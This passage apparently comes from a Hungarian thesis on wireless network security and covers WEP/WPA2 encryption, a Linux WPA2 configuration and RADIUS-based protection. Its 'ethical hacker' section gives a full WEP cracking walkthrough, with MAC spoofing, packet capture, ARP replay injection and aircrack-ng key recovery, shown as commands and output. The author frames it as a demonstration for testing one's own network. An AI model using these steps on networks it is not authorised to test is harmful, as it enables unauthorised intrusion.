A hallgatók is azt szeretnék, hogy a rektor változtasson az álláspontján. A Kanadai Egészségügyi Hivataltúlzásnak vette a rektor aggodalmát. A hivatal vezetője szerint a WLAN használatának semmilyen káros hatása nincs az emberi szervezetre.

5. Wifi biztonság

5.1 Titkosítás

Amikor üzembe kívánunk helyezni egy WLAN routert természetesen a gyári beállításokkal üzemképes állapotban lesz, azonban a problémát az okozza, hogyha a WLAN routerünket a gyári, azaz az alapértelmezett beállításokon hagyjuk üzemben. Így még a routerhez való hozzáférés is könnyű lehet a behatolónak. a rá jelentkezés. Első nekifutásra tegyük egyedivé a router jelszavát. WLAN hálózatokban többféle titkosítási eljárás alkalmazhatunk. Azt azonban figyelembe kell vennünk, hogy a WEP (Wired Equivalent Privacy) idejétmúlt. De létezik egy újabb típus a WPA2 ez már biztonságosabb, mint az elődje. Ahhoz hogy használatba vegyük WPA2-t szoftveres frissítést kell elvégeznünk. Töltsük le a WPA2 hotfixet. Ha már frissítettük rendszerünket, nekiláthatunk routerünk konfigurálásának. Lépünk be a routerünk adminisztrációs oldalára, és ott válasszuk ki a WPA2 Personal lapon a *TKIP-AES* algoritmust majd a Shared Key mezőben, megadjunk egy jelszót és elmentjük a változtatásokat. Így már

biztonságosabb lesz az internet kapcsolatunk a támadók ellen. Használjunk egyedi hálózatnevet. Írjuk át az SSID-t. Szűrjük MAC cím alapján. Azonban a profi hackerek ellen ez nem ad, teljes biztonságot. A felkészült és profi hackerek képesek megváltoztatni saját eszközük fizikai címét. Többféle titkosítási eljárás áll rendelkezésre annak biztosításához, hogy jogosulatlan személyek ne olvashassák el a vezeték nélküli hálózatban forgalmazott csomagokat, és ne férhessenek hozzá a hálózathoz. Amíg be nem vezették az új szabványt, amely a 802.11i szabvány volt csak egykulcsos módszer létezett a hitelesítésre és az adattitkosításra. A kulcsok kezelésére úgynevezett generálós rendszer került bevezetésre, hogy elkerülhető legyen a támadó számára a hálózat lehallgatása és a támadási pontok lehetősége. Az MK master kulcsot tekinthetjük egy jelszónak vagy valamilyen karakter sorozatnak, amit mind a kliensnek illetve a hitelesítést végzőnek ismerni kell. Master kulcs pár a hálózatba való bejelentkezéshez a kliens és a Rádiusz szerver a kulcsból generál egy véletlen értéket. A Rádiusz szerver a kulcsot elküldi az AP-nak, amely engedélyezi a hozzáférést a hálózathoz. Ezen felül megosztásra kerül egy ideiglenes kulcs pár megosztása. Ez a kulcs pár mindig újra generálódik a bejelentkezés alakalmával. Ahhoz hogy ideiglenes kulcsot tudjunk generálni a kliens, valamint az AP-nak a Mac címe valamint egy generált szám szükséges. Az ideiglenes kulcspárt a kliens és az AP használja. Az ideiglenes kulcs párnak a 0-127 biten ellenőrző kulcs, amelynek segítségével ellenőrizhetővé válik az kliens és az AP között az ideiglenes kulcsrendelkezésre állása. Ez abból a célból jött létre, hogy megakadályozza a kulcs meghamisítását. Létezik egy kulcskódoló kulcs (KEK – Key Encryption Key) amely ellenőrzi az ideiglenes kulcs megosztását. Ezt küldi az AP a kliensnek. Az ideiglenes kódoló, amely viszont az adatok kódolását szolgálja. A kódolás történhet RC 4 algoritmussal is. A kulcsmenedzsmentet, ha megfigyeljük, levonhatjuk következtetésként, hogy a bejelentkezések alkalmával új kulcsok kerülnek a rendszerbe. A master kulcsokat nem használjuk fel, mert egyirányú generált ideiglenes kulcsok jönnek létre a rendszer által. Ezt a módszert azért is tartom jónak, mert ez által a kulcsok dinamikus cserélődhetnek. Adjuk meg a Master kulcsnak egy idő intervallumot, amelynek alapján új kulcsokat generálhat. Majd ezután a rendszer által generált kulcsot megkapják a hálózatban résztvevő eszközök. A kliens is generál egy új kulcsot, ha a hálózatba új kulcsok kerültek.

Ennek segítségével a az adatcsomagok különböző kulccsal titkosítható.

Wired Equivalent Privacy

A WEP-et (Wired Equivalent Privacy) abból a célból jött létre, hogy biztonságot adjon a vezeték nélküli hálózatban. A WEP-nek köszönhetően az adatok titkosítva vannak. Így ha támadó le kívánja hallgatni hálózatunkat számára semmilyen felhasználható információt nem fog kapni. Amikor a felhasználó csatlakozni kíván hálózatunkhoz először egy úgynevezett hitelesítési eljárás, esik át. Majd csak ezt követően van lehetőség az adat visszaféjtésére. A WEP tanulmányozása után a wep protokoll az úgynevezett RC4 algoritmusra épül. A kulcsok a szabvány szerint 40 bitesek, de a mai hardverek gyakorlatilag kivétel nélkül támogatják a 104 bites hosszúságú változatát. Ebből látható, hogy az IV milyen fontos része a titkosításnak. Ennek segítségével érhető el hogy az RC4 algoritmus hogy mindig más titkosító kulcsot használjon. A titkosítás úgy működik hogy a tikosított kulcsból valamint egy véletlen számból egy véletlen bájt sorozatot állítanak elő, amit XOR-olnak a üzenettel. Ennek tudatában a titkosítás az alábbi módon megy végbe.

$$C = [M \parallel ICV(M)] \text{ XOR } [RC4(K \parallel IV)]$$

59. ábra Wlan titkosítás

Ha csak egy közös kulcsot használnánk nem volna biztonságos. Az algoritmus úgy működik, hogy egy véletlen értéket ad a kulcshoz amit a IV-ből és a WEP kulcsból vesz amely alapján megtudja határozni a kulcsot. IV más méretű is lehet. Jelenleg 24 bites a wep alapján. De vannak olyan esetek, amikor a IV nem változik meg, mert a wep kulcs és a kulcsfolyam generátor közösen biztosítja, hogy az különböző üzenethez más és más kulcs generálódjon. Tehát a IV értéke folyamatosan változik, de a kliensnek hogy az üzenetet dekódolni tudja szüksége lesz a IV értékére, így ennek lévén a IV értékét nem titkosított formában hozzá kell adni. A kulcs segítségével egy tömb készül minden kerethez. A kódolt keretet a fogadó fél számára ismert, így már ebből és a hozzáadott IV-t használva már dekódolni tudja az adatokat. A keret sértetlenségéért a CRC32 ellenőrző összeg segítségével a fogadó fél megvizsgálja kódolt formában. Ha fogadó fél által meghatározott érték nem egy-egyeznek a kapottal ebben az esetben az adatot eldobja és sérültnek tekinti a csomagot.

A szabványnak van néhány gyenge pontja. A rendszer által előállított kulcsok elleni támadás sikeres lehet. Ennek ellenére jobb WEP-et használni, mint egyáltalán nem titkosítani a hálózatot. Néhány évre rá kiderült, hogy a WEP nem biztonságos, mert súlyos biztonsági hibákat találtak az informatikus szakemberek, így arra lehetett következtetni, hogy nem nyújt védelmet. A WEP tehát az üzenetet rejtjelezi, valamint megköveteli a kliensről, hogy hitelesítse magát az AP felé. A kliens a hitelesítést egy titkos kulccsal végzi. A hitelesítést egy protokoll végzi. Elsőnek a kliens hitelesíti önmagát majd az AP generál egy véletlen számot, majd azt elküldi a kliensnek. A kliens rejtjelezi a küldött üzenetet és ennek eredménye visszaküldésre kerül az AP-nak. A rejtjelezést csak a kliens és az AP ismeri. Ha az AP sikeresen dekódolja a választ, akkor (azaz a dekódolás eredményeként visszakapja saját kihívását), akkor elhiszi, hogy a választ az adott kliens állította elő, mert csak az ismeri a helyes válasz generálásához szükséges titkos kulcsot. Ezek után az AP dönthet arról hogy engedélyezi –e a csatlakozást a hálózatához a kliensnek. A döntésről az AP tájékoztatja a klienst így a hitelesítés után a kliens és az AP kommunikálhatnak egymással rejtjelezve.

Tehát a kommunikáció titkosított formában, folyik. Nyilvánvaló, ha a kapcsolat nem lenne, titkosítva abban az esetben könnyebben lehallgatható lenne.

A WEP-nek fő funkciója van:

- Authentikáció
- Titkosítás
- Adat integritás ellenőrzése (CRC-32)

60. ábra Wep működése

1. A kliens jelzi, hogy szeretné hitelesíteni magát (authenticate request)
2. Az AP generál egy véletlen számot, s azt kihívásként elküldi a kliensnek (authenticate challenge)
3. A kliens rejtjelezi a kihívást (véletlen szám) egy olyan kulccsal, amelyet mindketten ismernek, és az eredményt visszaküldi az AP-nek.
4. Ha az AP sikeresen dekódolta az üzenetet, ez azt jelenti, hogy a kliens valóban ismeri a megfelelő kulcsot, ezért válaszul egy authenticate success (hiba esetén failure) üzenetet küld a kliensnek.

A kliens csak abban az esetben kommunikálhat az adott hálózatban, ha mint az azonosítás sikeresen teljesült

Hamarosan kidolgoztak egy új szabványt, amelyet IEEE 802.11i szabványnak neveztek el. (AES – Advanced Encryption Standard). Erre azért is volt szükség, mert a wep gyenge titkosítással rendelkezett, amely könnyen feltörhető. Ez volt a CCMP.

CCMP (az IEEE 802.11i definiálja)

A CCMP a kulcskezelést írja le. Ezt általában a WPA-EAP-vel együtt használják, de WPA-PSK-val is használható. A titkosítás az AES-nek megfelelően történik és ez erősebb, mint a WEP szabvány RC4 titkosítása.

Linux esetében (WPA2 titkosítás)

Elsőként eltávolítottam a network-managert, a WLAN adapter konfigurálását pedig a /etc/network/interfaces fájl szerkesztésével oldottam meg. Az alkalmazni kívánt hálózati

paraméterek a következők: ssid broadcast kikapcsolása, statikus IP cím kiosztás, WPA és WPA2 titkosítás, AES és TKIP titkosítási módszer. Ezeknek megfelelően a következőkkel egészítettem ki a már említett /etc/network/interfaces fájlt:

```
auto wlan0
iface wlan0 inet static
address 192.168.1.2
netmask 255.255.255.0
gateway 192.168.1.1
dns-nameservers 192.168.1.1
wpa-driver wext
wpa-ssid Router
wpa-ap-scan 2
wpa-proto RSN WPA
wpa-pairwise CCMP TKIP
wpa-group CCMP TKIP
wpa-key-mgmt WPA-PSK
wpa-psk 0123456789abcdef
```

Megjegyzések:

az **inet** után kell megadni, hogy az ip címek kiosztását hogyan szeretnénk megvalósítani, ami lehet static, statikus esetén, és dhcp, automatikus címkiosztás esetén

address: a gépünknek szánt ip cím, dhcp esetén nem kell megadni

netmask: alhálózati maszk, dhcp esetén nem kell

gateway: ez az alapértelmezett átjáró, általában a router ip címe, dhcp esetén nem kell

dns-nameservers: DNS névszerver címe, itt is a router címét kell megadni általában, dhcp esetén nem kell

wpa-driver: a wpa titkosért felelős driver (ez függ az használt hardvertől, nálam a wexttel működik, de előfordulhat, hogy más kell)

wpa-ssid: a hálózatunk ssidje

wpa-ap-scan: 1, ha az ssid Broadcast be van kapcsolva, 2, ha ki van kapcsolva a routerben

wpa-proto: RSN=WPA2 esetén, WPA=WPA1 esetén

wpa-pairwise és wpa-group: CCMP=AES esetén, TKIP=TKIP esetén

wpa-key-mgmt: WPA-PSK előre megosztott kulcs (pre-shared key) használta esetén

wpa-psk: az előre megosztott kulcs hexadecimális alakban, ehhez az ASCII kulcsunkat az alábbiak szerint konvertálhatjuk:

Nyitunk egy terminált és a következő paranccsal megtehetjük a titkosítást.:

```
wpa_passphrase SSID ASCII kulcs
```

```
pl. ha az SSID=teszt, kulcs=12345678
```

```
wpa_passphrase teszt 12345678
```

eredmény:

```
network={
ssid="teszt"
```

```
#psk="12345678"  
psk=962cd2c7455289e077ec7ed73a879322e820c9b6781837f2b0036e9547a146d7  
}
```

A fentebb említett helyre a psk utáni hosszú számsort másoljuk be. Ezek után mentjük el az új interfaces fájlnkat, és indítsuk újra a hálózatot a `sudo /etc/init.d/networking restart` paranccsal.

5.2 Wifi feltörési kísérletek (Etikus hacker

Az etikus hackerkedés mára fogalomná vált. Népszerűek a témával kapcsolatos előadások. Magam is érdekes témának találom, és mivel diplomamunkámhoz is kapcsolódik, szeretném bemutatni néhány módszert, amelynek segítségével, megpróbálnak bejutni WLAN hálózatunkba. Az itt leírtakért felelősséget nem vállalok, ez csak bemutatásra szolgál a hálózat tesztelése céljából a rendszer biztonságos üzemelése érdekében.

Más hálózatok feltörése szigorúan tilos, kizárólag csak bemutatás, és tesztelés miatt készült ez a leírás. WLAN hálózatok a világszerte különböző pontjain találhatóak. Sajnos azonban a kiépített WLAN hálózatok támadók célpontjává is válhatnak. Feltörhetik a hálózatot, és használatba vehetik a szolgáltatást. Számos mód létezik. Az itt leírtakért felelősséget nem vállalok. Csak azt kívánom bemutatni, hogy milyen módszerekkel próbálnak a hackerek bejutni az adott hálózatba. Elsőként tekintsük meg a WEP-et, amely ma már nem mondható biztonságosnak.

Az már bizonyára sokak számára nem titok, hogy a WEP titkosítással védett WiFi hálózatok titkosítási kulcsának megszerzése nem egy bonyolult feladat, ezeket, a rendszereket gyakorlatilag könnyedén fel tudják törni a haladó felhasználók. Gyakorlatilag ezzel is magyarázható, hogy a rutinosabb és nagyobb szakértelemmel bíró felhasználók WPA és WPA2-es titkosítás segítségével próbálják megvédeni vezeték nélküli hálózataikat az illetéktelenektől, illetve a rosszindulatú támadóktól. A klasszikus WPA jelszótörő, nyers erőt használó szótár alapú feltörő programok (brute force dictionary, cracking) technológiák is léteznek. De ezek a szakemberek állításai szerint rendkívül lassúak és messze nem olyan hatékonyak, mint az egyéb ún. trükkös, módszerek. Az előbbi módszerrel a cracker gépen futó alkalmazás hatalmas erőforrás-használat mellett próbálgatja végig a lehetséges kombinációkat, míg végül eljut a kulcshoz, ez a mai ismeretek szerint csak egy egyszerű értelmes szót használó jelszónál lehetséges. Ha a jelszó az ajánlott kisbetű, nagybetű, szám kombinációt tartalmazza és legalább 8 karakter, gyakorlatilag a fent említett módszerekkel – használható időn belül – nem törhető. (egy mai korszerű számítógép videó kártya bevonása nélkül több ezer év alatt található használható jelszó hasht).

Ha csak wep védelmet használjuk, hálózatunk biztonsága érdekében nem vagyunk biztonságban, mert a támadó egyszerűen juthat hozzá az információhoz. Egy mai számítógépnek – videokártya bevonása nélkül – 6-8 karakteres kisbetű, nagybetű, szám jelszó (hash) feltörése, maximum 1-2 nap un rainbow tábla segítségével. Egy értelmes szólánc esetében ez az idő pár percre rövidül le.

De hogyan viszi ezt végbe?

A módszer elmélete az alábbiak alapján megy végbe. Az AP egy titkos kulcs alapján beazonosítja a klienst. Az AP-tól a kliens kap egy generált üzenetet a kliensnek.

Ezután a kliens válaszol, az üzenetre visszaküldi az AP-tól kapott üzenetet a kliens titkos kulcsával, de titkosítva. Az AP elkezd dekódolni a klientsől kapott üzenetet, majd ha ezt azonosnak találja az elküldöttel a fenti leírtak szerint a kommunikáció engedélyezve lesz.

Majd a támadó lehallgatja a kommunikációs csatornát, begyűjti „Kihívás–Válasz párt, amiből különválasztja a kódolatlan IV-t. Feltételezzük, hogy a támadó rendelkezik az üzenet kódolatlan, illetve kódolt párjával meg fogja kapni a kódoláshoz szükséges kulcspárt. A hamis azonosítást ezután már nem okoz különösebb nehézséget a támadó, megpróbál csatlakozni az AP-hoz, amitől közben folyamatosan fogadja az üzeneteket. Az üzenetek között lenni kell olyan üzenetnek ami IV-je azonos lesz az korábban lehallgatott üzenettel.

Ezután egy hamisított csomagot kell előállítani

$IV + (IV + Ch + CRC-32(Ch) \mathbf{XOR} RC4(v,k))$

Ezt az AP helyesnek veszi majd végül autentikálja a támadót. A kommunikáció létrejön a hálózatban.

A wep protokollnak vannak gyengéi, amelyre elkezdtek kidolgozni fejlettebb biztonsági protokollokat, ami a wep gyenge pontjainak kiküszöbölésére szántak biztonságosabb titkosítás technikával ellátva. Konklúzióként levonva elmondhatjuk, hogy a WEP nem ad megfelelő biztonságot hálózatunk számára.

Wlan feltörése:

Amikor bontjuk a saját wifi kapcsolatunkat, akkor a wifi kilitázza az elérhető hálózatokat. amin vagy van jelszó, vagy nincs ha nincs simán lehet csatlakozni ha van akkor valamilyen programmal vagy visszafejtjük vagy kitaláljuk. De lehet, hogy az a jelszó (általában így van) wpa vagy weppel vannak titkosítva.

Mire is van szükségünk?-

Egy számítógépre és egy vezeték nélküli adapterre.

Linux operációs rendszer (Back Trek Linux)

Nézzünk néhány fogalmat, amellyel tisztában kell lennünk.

- ◆ **airodump** - egy eszköz beszerzésének csomagok egy vezeték nélküli útválasztó (más néven egy AP
- ◆ **aircrack** - egy eszköz a dekódoláshoz WEP kulcsok

- ♦ **iwconfig** - egy eszköz beállítása a vezeték nélküli adapter. Használhatja ezt annak érdekében, hogy a vezeték nélküli adapter a "monitor" mód, amely alapvető fontosságú a küldő hamis ARP kéréseket a cél router
- ♦ **macchanger** - olyan eszköz, amely lehetővé teszi, (hamis) A MAC-cím

Ha még eddig nem töltöttük le a Linux disztribúciót. <http://www.backtrack-linux.org/downloads/> oldalról. Ezután két dolgot tehetünk, vagy megpróbálkozunk egy rendes telepítéssel a Windows mellé vagy Wmware Workstation programot használunk <http://www.vmware.com/download/ws/> amely nem más, mint egy virtuális gép, amelynek segítségével futtathatjuk Linux rendszerünket.

Én az előbbit választottam. Letöltés után írjuk ki az ISO állományt cd-re. Ha ezzel megvagyunk, telepítsük fel a rendszert.

Tételezzük fel hogy a rendszer feltelepítettük. Most már elkezdhetjük az alábbi lépések végrehajtását.

A rendszer üzemképes állapotából indulok ki. Megjelenik a prompt jel. Jelentkezzünk be, a telepítés során megadott felhasználónévvel és jelszóval. A grafikus felület elindult (KDE). Indítsunk el egy terminált.

Indítsuk el a kismet programot.

Miért használjuk a kismet programot. ?

Ha szeretnénk megtudni az SSID-t valamint a csatorna számát.

A Kismet a wifi adaptert automatikusan monitor módba teszi. Ezt a virtuális hozzáférési pont segítségével teszi meg., azaz létrejön egy virtuális wifi0 adapter.

Az iwconfig parancs segítségével megtudhatjuk

Ha szeretné megtalálni a bssid, ESSID, és a csatorna számát az AP Ön hozzáférését.

Kismet automatikusan helyezi a vezeték nélküli adaptert monitor módban. Ezt úgy éri el létrehozásával VAP (virtuális hozzáférési pont?), Vagy más szóval, ahelyett, hogy csak miután ath0, mint a vezeték nélküli kártya létrehoz egy virtuális wifi0 és hozza ath0 a monitor módban automatikusan. Hogy megtudja a készülék nevét csak típus:

Kismet egy vezeték nélküli hálózat felderítése, helymeghatározása és behatolás-azonosító program, amely használható a vezeték nélküli támogatott hálózati kártya Kismet segítségével meg lehet találni és csatlakozni a különböző látható és rejtett kinyitott vezeték nélküli hálózatokhoz.

Az alapvető elmélet az, hogy szeretnénk kapcsolódni egy Access Pointhoz amely WEP segítségével van titkosítva, de kulcsról nincs ismeretünk.

Követelmények:

- Linux operációs rendszer
- Számítógép, amely kompatibilis a 802.11 szabvány (Wlan kártya)
- Wifi Access point

- Wep titkosítás

Itt vannak az alapvető lépéseket:

1. Indítsuk el a vezeték nélküli interfész a monitor üzemmódban az adott AP csatorna
2. Start airodump-ng az AP csatorna szűrővel bssid gyűjteni.
3. Használjuk az aireplay-ng-deauthenticate a vezeték nélküli kliens
4. Futassuk az aircrack-ng, hogy kiváló az előre megosztott kulcs segítségével a hitelesítés kézfogás

Készítsük fel WLAN kártyánkat „Monitor Mód-ba”

Adjuk ki az alábbi parancsokat:

Adjuk ki az alábbi parancsokat:

airmon -ng

Megmondja, hogy milyen chipsettel rendelkezik a WLAN kártyánk

A WLAN kártyát az úgynevezett monitor módba teszi. Monitor mód az a mód, amellyel, a kártyával lehet hallgatni minden egyes csomagra, a levegőben. Lehallgatás útján minden egyes csomagról, tudunk.

modprobe -r iwl3945

```
iwconfig
```

Kilistázza az adapter nevét.

```
ifconfig down [interface]
```

Most meg kell változtatni a MAC címet az adapternek:

```
macchanger --mac 00:20:33:44:56:77 [device]
```

A kártya monitor üzemmódban.

```
bt ~ # macchanger --mac 00:11:22:33:44:66 wifi0
Current MAC: 00:11:22:33:44:66 (unknown)
Faked MAC: 00:11:22:33:44:66 (Cimsys Inc)
bt ~ # airmon-ng start wifi0
```

Interface	Chipset	Driver
wifi0	Centrino a/b/g	ipwraw-ng (monitor mode enabled)

61. ábra Monitor mód engedélyezése

```

CH 6 ][ BAT: 1 hour 34 mins ][ Elapsed: 8 s ][ 2008-08-19 15:07
BSSID          PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH  ESSID
[REDACTED]      0     15        0  0   6  54.  WEP   WEP   [REDACTED]
[REDACTED]      0     28        0  0  11  11.  WEP   WEP   [REDACTED]
[REDACTED]      0     32        0  0   6  54.  WPA2  CCMP  PSK   [REDACTED]
[REDACTED]      0     51       66  9   6  54.  WEP   WEP   [REDACTED]
[REDACTED]      0     19        0  0   9  54.  WEP   WEP   [REDACTED]
[REDACTED]      0     46        0  0   6  54.  WEP   WEP   [REDACTED]
[REDACTED]      0     48        2  0  11  54.  WEP   WEP   [REDACTED]

BSSID          STATION          PWR  Rate  Lost  Packets  Probes
[REDACTED]     [REDACTED]      0  0- 0    1     7  [REDACTED]
[REDACTED]     [REDACTED]      0  0- 0   270   65  [REDACTED]
[REDACTED]     [REDACTED]      0  0- 0    41    33  [REDACTED]
    
```

62. ábra Wlan kártyánk monitor módban

Figyeljünk arra, hogy vegye figyelembe a MAC cím (BSSID), csatorna (CH) és nevet (ESSID) a cél a hálózat. Most meg kell kezdenünk az adatgyűjtést, a WIFI hozzáférési pont támadás céljából:

```
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]
```

```

CH 6 ][ BAT: 55 mins ][ Elapsed: 1 min ][ 2008-08-19 15:47
BSSID          PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH  ESSID
[REDACTED]      0 100    702     7256  73   6  54.  WEP   WEP   OPN  [REDACTED]

BSSID          STATION          PWR  Rate  Lost  Packets  Probes
[REDACTED]     00:11:22:33:44:66  0  0- 0     0     2
[REDACTED]     [REDACTED]      0  0- 0     0    7772
    
```

63. ábra Adatgyűjtés

A fenti parancs kimenete összegyűjtött adatok fájlja: network.out.

Nyissunk meg egy másik shell, és hagyjuk, hogy az előző parancs fusson. Most szükség van hamis csomagokra a hozzáférési ponthoz, hogy felgyorsítsuk a kimeneti adatokat. Ellenőrizzük a hozzáférési pont kiadásával a következő parancsot:

```
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
```

```

bt ~ # aireplay-ng -3 -b [REDACTED] -h 00:11:22:33:44:66 wifi0
15:49:07 Waiting for beacon frame (BSSID: [REDACTED]) on channel 6
Saving ARP requests in replay_arp-0819-154907.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 476985 packets (got 23863 ARP requests and 131220 ACKs), sent 31088 packets...(500 pps)
bt ~ #
    
```

64. ábra Csomag generálás

Ha a parancs sikeres lesz, akkor generálunk csomagokat a hálózatban.

```
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
```

```
bt ~ # aireplay-ng -3 -b [redacted] -h 00:11:22:33:44:66 wifi0
15:49:07 Waiting for beacon frame (BSSID: [redacted]) on channel 6
Saving ARP requests in replay_arp-0819-154907.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 476985 packets (got 23863 ARP requests and 131220 ACKs), sent 31088 packets...(500 pps)
bt ~ #
```

65. ábra AP adatküldés

Ez arra kényszeríti a hozzáférési pontot, hogy küldjön ki egy csomó csomagot, amivel fel lehet majd törni a WEP-kulcsot. Ellenőrizzük az airodump-ng héj, és látnunk kell a "data" részben az eddig megtelt csomagokat.

```
CH 6 ][ Elapsed: 6 mins ][ 2008-08-19 15:55
BSSID          PWR RXQ Beacons  #Data, #/s  CH MB ENC CIPHER AUTH ESSID
[redacted]      0 83    3363  144981  446  6 54 WEP WEP   OPN JJ
BSSID          STATION          PWR   Rate Lost  Packets Probes
[redacted]      00:11:22:33:44:66  0  0- 0  20280  133226
[redacted]      [redacted]         0  0- 0    2    32188
```

66. ábra Csomaggyűjtés

Körülbelül 10,000-20,000 csomag esetén elkezdhetjük a törni a WEP-kulcsot.

```
bt ~ # aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [redacted] -h 00:11:22:33:44:66 wifi0
For information, no action required: Using gettimeofday() instead of /dev/rtc

Size: 80, FromDS: 1, ToDS: 0 (WEP)

      BSSID = [redacted]
      Dest. MAC = 00:11:22:33:44:55
      Source MAC = [redacted]

0x0000: 0842 2c00 0011 2233 4455 001f c47e adc0 .B,..."3DU...~..
0x0010: 001f c47e adc0 408f 3ed0 d600 2c7a 5d47 ...~..@.>...;z]G
0x0020: fc45 7c17 5df6 cf29 b511 c8e5 b5aa 599f .E|.]).....Y.
0x0030: 4594 27f4 3a4c c3a0 0395 3982 f573 9d6e E.'.:L....9..s.n
0x0040: 32f8 2403 09dc ed79 37be 1e72 6eab e847 2.$...y7..rn..G

Use this packet ? y

Saving chosen packet in replay_src-0819-155032.cap
You should also start airodump-ng to capture replies.

Sent 109540 packets...(476 pps)
```

67. ábra Csomag

Ha van elég csomag, akkor elkezdhetjük a törés.

Adjuk ki az alábbi parancsot.

```
aircrack-ng -n 128 -b [bssid] [filename]-01.cap .
```

```
Aircrack-ng 1.0 rc1 r1085

[00:01:35] Tested 50507 keys (got 132062 IVs)

KB    depth  byte(vote)
0     0/ 1    7D(170496) DD(150528) 5A(148992) E8(148480) 3E(146944) 4D(146432) 82(146176)
1     0/ 1    00(172800) 52(154880) 1D(153600) 40(151040) EB(150528) F9(148480) 44(147200)
2     0/ 1    05(178176) 55(151552) 58(149760) 71(148736) 86(146944) D7(146432) 5C(145920)
3     0/ 1    F9(180736) DE(148736) 4A(147968) 52(147968) E8(147712) EF(146688) 9A(145920)
4     0/ 1    8D(173568) 80(154112) D4(148480) 4A(147968) 56(147200) 74(146176) F9(146176)
5     0/ 1    C9(176128) 62(146176) 3F(145920) 9F(145920) 87(145408) 5E(144384) A8(144384)
6     0/ 1    E4(174336) F7(151296) BE(149760) 6B(148224) F2(146432) 42(146176) 4E(145920)
7     0/ 1    89(154880) 82(153600) 5E(153088) 26(150528) 56(149760) 03(148480) 1E(147968)
8     0/ 1    F2(170240) 6A(148224) DA(147456) 62(146688) 77(146688) D8(145920) 26(144896)
9     0/ 1    11(179456) 30(153600) 9D(146688) A9(145664) 7A(145408) 05(145152) C5(145152)
10    0/ 1    A7(151552) AC(149504) 6F(147968) C8(146688) E3(146432) 34(146176) BD(146176)
11    0/ 1    0D(151040) 56(149504) CE(148736) CD(148480) 32(146176) 80(145664) 7E(145408)
12    0/ 1    98(152576) 97(151284) 25(145800) FB(145720) 48(145232) D8(144584) C0(144184)

KEY FOUND! [ 7D:00:05:F9:8D:C9:E4:89:F2:11:C5:49:98 ]
Decrypted correctly: 100%
```

68. ábra Törés

Végül megkapjuk a kulcsot.

Vegyük tanulságnak, hogy a wep alkalmazása nem ad megfelelő biztonságot. Javasolom, hogy WPA2 titkosítást.

5.3 WLAN hálózatunk védelme

WLAN rendszerünk tervezésekkor figyelembe kívánom venni, hogy központi menedzselésű legyen a rendszer és az AP (Access Point) a hozzáférési pontokkal. Az iskola felhasználóinak azonosítását egy központi szerver úgynevezett Rádiusz szerver végzi a vezeték nélküli hálózatban amelynek feladata hogy a felhasználó jogosult –e az iskola vezeték nélküli hálózatát használni az internet eléréséhez. Ha a felhasználó jogosult a vezeték nélküli hálózat használatára a kliens számítógép kap egy valós ip címet, amelynek alapján jogosult az iskola WLAN hálózatának használatára.

RADIUS Server

RADIUS Serverlehetővé teszi, hogy növeljük az elérhető Wi-Fi hálózat biztonságát, valamint a központosított hitelesítést és az alkalmazást több ezer, sőt több millió személyek. A RADIUS enterprise Server egy jól konfigurálható rendszer.

A központi felhasználói adatbázis használható számos hozzáférési pontnál, amely támogatja a felhasználók belépésének hitelesítését. ClearBox a hitelesítés az LDAP-címtárak (pl. MS Active Directory, openldap) A Wi-Fi-hitelesítés, támogatja az IEEE 802.1x hitelesítést biztonságos és megbízható hitelesítés szolgáltatásokkal WEP/WPA/WPA2 védett vezeték nélküli hálózatokhoz. Támogatja az összes támogatott protokollok a Windows vezeték nélküli ügyfelek (Windows XP SP2, Windows Vista) a jelszó alapú hozzáférés és az EAP-TLS digitális bizonyítványok alapú hozzáférést.

Véleményem szerint az eddigi tapasztalataim alapján a „Rádiusz szerver” az egyik legjobb megoldás WLAN hálózatunk védelmére.

Összefoglalás

Az első vezeték nélküli hálózat 1971-ben hozták létre a Hawai Egyetemen. Kezdetben problémát okozott a gyártók eszközei között az egymással való működésben. A megbízhatóság és a teljesítmény fő szempont volt, de a technikai eszközök nem voltak kiforrottak. A végső megoldást a szabványosítás hozta. 1980-ban az Amerikai Szabványügyi Testület a 802.11x-es IEEE (Institute of Electrical and Electronics Engineers) szabvány kidolgozását javasolta a helyzet megoldására.

A mai modern kor alapján a Wlan hálózat megépítése előzetes tervezést és megfelelő szakértelmet igényel, de jól skálázható és könnyebb bővítést tesz lehetővé a felhasználók számára. Diplomamunkám célja egy olyan vezeték nélküli hálózat megtervezése, amely megfelel a felhasználói igényeknek, megismerkedünk a hálózat szabványaival, a tervezés és a kiépítés során felhasznált szoftver és hardver szükségletekkel. Az előzetes tervezésben tervrajzot készítünk, amely alapján az aktív eszközök helyzetét tudjuk meghatározni.

Egy vezeték nélküli antenna elkészítése is napvilágra kerül, amelynek elkészítésének lépéseit is megismerhetjük. A működési leírásban már a megtervezett hálózat fizikai kiépítéséről esik szó, amelyben bekonfiguráljuk Windows és Linux rendszer alatt Rádiusz szerverünket. Bemutatom az UTP kábel szerelés lépéseit, amely vezetéket felhasználom az Access Pointok összekötésére a kapcsolóhoz. A kábelek elhelyezkedésén kívül hálózat terve tartalmazza az Access Pointok által biztosított lefedettség területét is amely a szemléltető ábra is mutat, amelyek alátámasztják a tervben szereplő megoldások szükségességét. Bemutatásra kerül néhány WLAN hálózati segédprogram, amely hasznos lehet a számunkra. Ilyen például az Ethereal amely, egy LAN analízáló program, illetve az említésre kerül még a jól ismert Kismet amely mára az egyik legnépszerűbb program amelyet alkalmazhatjuk a hálózati felderítésre.

